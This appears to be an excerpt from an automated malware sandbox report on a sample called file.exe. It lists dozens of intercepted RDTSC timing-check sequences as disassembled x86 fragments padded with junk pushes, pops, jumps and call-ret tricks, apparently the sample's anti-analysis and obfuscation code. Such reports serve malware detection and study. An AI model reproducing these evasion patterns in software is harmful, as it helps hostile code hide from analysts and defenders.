                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792661 second address: 7926F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F701CDA8A68h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 add esi, 5A698D30h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F701CDA8A68h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 jmp 00007F701CDA8A79h 0x0000004a push 00000000h 0x0000004c mov esi, dword ptr [ebp+122D2ABFh] 0x00000052 xchg eax, ebx 0x00000053 jmp 00007F701CDA8A72h 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F701CDA8A6Ah 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790D08 second address: 790D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7926F5 second address: 79270F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793102 second address: 793162 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx esi, ax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F701CDC8378h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, 5CE869B5h 0x0000002e push eax 0x0000002f mov esi, edx 0x00000031 pop edi 0x00000032 mov di, ax 0x00000035 push 00000000h 0x00000037 jmp 00007F701CDC8386h 0x0000003c push eax 0x0000003d pushad 0x0000003e jl 00007F701CDC837Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792E68 second address: 792E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797D9A second address: 797D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792E6C second address: 792E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797D9E second address: 797DB1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007F701CDC8376h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B5FD second address: 79B616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A74h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A6F0 second address: 79A6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B616 second address: 79B627 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F701CDA8A66h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B627 second address: 79B6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F701CDC8378h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov ebx, 1AD062A6h 0x00000026 push 00000000h 0x00000028 call 00007F701CDC8385h 0x0000002d call 00007F701CDC8387h 0x00000032 mov ebx, 5D140B4Dh 0x00000037 pop ebx 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b jmp 00007F701CDC8384h 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79C53A second address: 79C544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F701CDA8A66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B7C9 second address: 79B7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79C544 second address: 79C548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B7CD second address: 79B7D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B7D7 second address: 79B7DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E528 second address: 79E532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F701CDC8376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E532 second address: 79E536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E536 second address: 79E57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F701CDC8378h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push edx 0x00000026 jnl 00007F701CDC837Ch 0x0000002c pop ebx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 sub di, C51Ah 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E57B second address: 79E57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E57F second address: 79E585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D7C8 second address: 79D7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D7CE second address: 79D7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E752 second address: 79E756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F74E second address: 79F753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1277 second address: 7A127B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A127B second address: 7A128D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC837Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A128D second address: 7A1291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A05A3 second address: 7A05B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A05B9 second address: 7A05C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A6Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A23C4 second address: 7A2445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jno 00007F701CDC8376h 0x00000010 pop edi 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F701CDC8378h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2A17h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F701CDC8378h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 mov edi, dword ptr [ebp+122D26E4h] 0x00000057 jnp 00007F701CDC8381h 0x0000005d push 00000000h 0x0000005f stc 0x00000060 push eax 0x00000061 push ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2445 second address: 7A2449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A146C second address: 7A147E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC837Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A147E second address: 7A1490 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jp 00007F701CDA8A6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1490 second address: 7A14A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F701CDC837Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A52EB second address: 7A52EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A52EF second address: 7A52F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A52F8 second address: 7A530A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F701CDA8A66h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A530A second address: 7A530E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A530E second address: 7A5376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F701CDA8A70h 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F701CDA8A68h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov bh, AEh 0x0000002d push 00000000h 0x0000002f add ebx, dword ptr [ebp+122D2B2Fh] 0x00000035 xchg eax, esi 0x00000036 jc 00007F701CDA8A6Ah 0x0000003c push esi 0x0000003d push esi 0x0000003e pop esi 0x0000003f pop esi 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F701CDA8A74h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A74B6 second address: 7A74BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A74BC second address: 7A7533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F701CDA8A76h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F701CDA8A68h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F701CDA8A68h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 xchg eax, esi 0x00000047 jmp 00007F701CDA8A6Ch 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 jg 00007F701CDA8A66h 0x00000056 pop ebx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7533 second address: 7A7544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC837Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A25AD second address: 7A25B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4486 second address: 7A44A4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F701CDC8384h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A551C second address: 7A5527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A25B1 second address: 7A25B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A44A4 second address: 7A44A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A663D second address: 7A6660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F701CDC837Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A672E second address: 7A6745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A6745 second address: 7A677C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F701CDC8388h 0x00000012 jne 00007F701CDC8376h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A677C second address: 7A6799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A79h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7622 second address: 7A7626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7626 second address: 7A7638 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7638 second address: 7A7659 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F701CDC8387h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A85EF second address: 7A85F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B041B second address: 7B041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4D0B second address: 7B4D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007F701CDA8A84h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F701CDA8A73h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4D50 second address: 7B4D78 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F701CDC837Ch 0x00000008 jns 00007F701CDC8376h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F701CDC8384h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74195F second address: 74196B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007F701CDA8A66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74196B second address: 74196F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74196F second address: 741992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F701CDA8A70h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 jl 00007F701CDA8A66h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAE8D second address: 7BAEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8387h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F701CDC8384h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAEC1 second address: 7BAEC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAEC7 second address: 7BAF05 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F701CDC8378h 0x00000008 push ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F701CDC837Dh 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007F701CDC8389h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB6B6 second address: 7BB6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB6BA second address: 7BB6BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB6BE second address: 7BB6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F701CDA8A78h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB6E2 second address: 7BB6E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBB2F second address: 7BBB5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F701CDA8A66h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F701CDA8A77h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBCF1 second address: 7BBCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBCF7 second address: 7BBCFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBE6A second address: 7BBE80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC8382h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBE80 second address: 7BBEB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F701CDA8A6Ah 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F701CDA8A6Fh 0x00000017 pop eax 0x00000018 jp 00007F701CDA8A6Ch 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBEB3 second address: 7BBED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F701CDC8376h 0x0000000a jmp 00007F701CDC8387h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBED4 second address: 7BBEDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBEDA second address: 7BBEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F701CDC8376h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBEE8 second address: 7BBEEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC03B second address: 7BC03F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC03F second address: 7BC057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F701CDA8A72h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC057 second address: 7BC05D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC05D second address: 7BC082 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F701CDA8A66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F701CDA8A77h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFDA0 second address: 7BFDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
